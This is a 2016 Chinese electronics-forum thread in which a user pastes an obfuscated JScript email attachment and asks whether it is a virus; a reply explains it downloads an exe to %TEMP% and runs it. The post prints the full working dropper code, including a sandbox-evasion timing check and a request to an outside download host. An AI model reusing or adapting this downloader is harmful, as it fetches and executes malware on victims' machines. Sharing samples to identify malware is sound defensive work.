搜索
bottom↓
回复: 1

高手帮忙看看下面这个JS文件的内容是不是病毒?

[复制链接]

出0入8汤圆

发表于 2016-3-29 22:09:04 | 显示全部楼层 |阅读模式
我的邮箱收到的一个*.js的文件,同时还有一个VCW.x的文件,担心是病毒,放上来大家看看。

var Njjebnuzmw = false;
var Drajvc = "CreateObject";
var Xjaqx = function Iuxll() {return WScript[Drajvc]("WScript.Shell");}();
var Wguoqb = 123213;
var Lvkavnlx = "MSXML2.XMLHTTP";
var Ujyncrq = 2123213;
var Aetzlpvn = 0;
function Hxwsaenrc(Vjctgfyrm){Xjaqx["Run"](Vjctgfyrm, Aetzlpvn, Aetzlpvn);};
function Yavxqo(){return Lvkavnlx;};
function Npfjsn(Pnqjpfm, Pmqmjhqx){return Pnqjpfm - Pmqmjhqx;};
function Vpwqiwx(){return Drajvc;};
/*@cc_on
  @if (@_win32 || @_win64)
    Njjebnuzmw = true;
  @end
@*/
if (Njjebnuzmw)
{
var Rknmqp = "";
function Btgig(){return 22;};
var Sgfezd = 0; var Lzjfcra = 0;
function Qanam()
{
var Kxuyqazf = new this["Date"]();
var Jzqjwao = Kxuyqazf["getUTCMilliseconds"]();
WScript["Sleep"](Btgig());
var Kxuyqazf = new this["Date"]();
var Ufpguwp = Kxuyqazf["getUTCMilliseconds"]();
WScript["Sleep"](Btgig());
var Kxuyqazf = new this["Date"]();
var Dyvdad = Kxuyqazf["getUTCMilliseconds"]();
var Sgfezd = "Gjtpzoz";
Sgfezd = Npfjsn(Ufpguwp, Jzqjwao);
var Lzjfcra = "Bxmlwd";
Lzjfcra = Npfjsn(Dyvdad, Ufpguwp);
Rknmqp = "open";
return Npfjsn(Sgfezd, Lzjfcra);
}
var Ixkwaxcqiv = false;
var Apygzghdxr = false;
for (var Cqwwsl = Aetzlpvn; Cqwwsl < Btgig() * 1; Cqwwsl++){if (Qanam() != Aetzlpvn){
Ixkwaxcqiv = true;
Lzjfcra = "31" + 11 * Sgfezd + Lzjfcra;
Apygzghdxr = true;
break;
}}
function Qkrgq() {return ((Ixkwaxcqiv == true) && (Ixkwaxcqiv == Apygzghdxr)) ? 1 : Aetzlpvn;};
if (Ixkwaxcqiv && Qkrgq() && Apygzghdxr){
function Nneeuvrwkd() {return Xjaqx["ExpandEnvironmentStrings"]("%TEMP%/") + "xx87Vzpdlz80Dn.exe";};
Zjrxmcvrq = Yavxqo();
Iqvjsptncx = WScript[Drajvc](Zjrxmcvrq);
var Gchpvr = 1;
while (Gchpvr){
try {
Iqvjsptncx[Rknmqp]("GET", "http://yorkshirecyclecompany.com/di8ols", false);
Iqvjsptncx["send"]();
Rruryo = "Sleep";
do {WScript[Rruryo](Btgig() * 11)} while (Iqvjsptncx["readystate"] < 2 * 2);
Gchpvr = Aetzlpvn;
} catch(Sinxxid){};
}
function Ofjhjo(Ekpgoo) {var Ihcbuu = (1, 2, 3, 4, 5, Ekpgoo); return Ihcbuu;};
Sezqmummew = WScript[Vpwqiwx()]("ADODB.Stream");
Zjrxmcvrq = Sezqmummew;
Zjrxmcvrq[Rknmqp]();
Zjrxmcvrq["type"] = Ofjhjo(1);
Zjrxmcvrq["write"](Iqvjsptncx["ResponseBody"]);
Sezqmummew["position"] = Ofjhjo(Aetzlpvn);
Zjrxmcvrq["Save" + "ToFile"](Nneeuvrwkd(), 2);
Sezqmummew["c"+"lose"]();
Metytqs = Nneeuvrwkd();
Hxwsaenrc(Metytqs);
}
}

阿莫论坛20周年了!感谢大家的支持与爱护!!

阿莫论坛才是最爱国的,关心国家的经济、社会的发展、担心国家被别国牵连卷入战争、知道珍惜来之不易的和平发展,知道师夷之长,关注世界的先进文化与技术,也探讨中国文化的博大精深,也懂得警惕民粹主义的祸国殃民等等等等,无不是爱国忧民的表现。(坛友:tianxian)

出0入0汤圆

发表于 2016-3-30 16:06:33 | 显示全部楼层
虚拟机运行下,去%TEMP%目录找那个xx87Vzpdlz80Dn.exe看看是不是病毒好了。
这种混淆后的js可读性很差,大致看了下,像是从yorkshirecyclecompany.com下载个exe文件保存在用户临时目录然后运行,从行为上看不像是什么好东西。
回帖提示: 反政府言论将被立即封锁ID 在按“提交”前,请自问一下:我这样表达会给举报吗,会给自己惹麻烦吗? 另外:尽量不要使用Mark、顶等没有意义的回复。不得大量使用大字体和彩色字。【本论坛不允许直接上传手机拍摄图片,浪费大家下载带宽和论坛服务器空间,请压缩后(图片小于1兆)才上传。压缩方法可以在微信里面发给自己(不要勾选“原图),然后下载,就能得到压缩后的图片。注意:要连续压缩2次才能满足要求!!】。另外,手机版只能上传图片,要上传附件需要切换到电脑版(不需要使用电脑,手机上切换到电脑版就行,页面底部)。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

手机版|Archiver|amobbs.com 阿莫电子技术论坛 ( 粤ICP备2022115958号, 版权所有:东莞阿莫电子贸易商行 创办于2004年 (公安交互式论坛备案:44190002001997 ) )

GMT+8, 2024-9-16 10:15

© Since 2004 www.amobbs.com, 原www.ourdev.cn, 原www.ouravr.com

快速回复 返回顶部 返回列表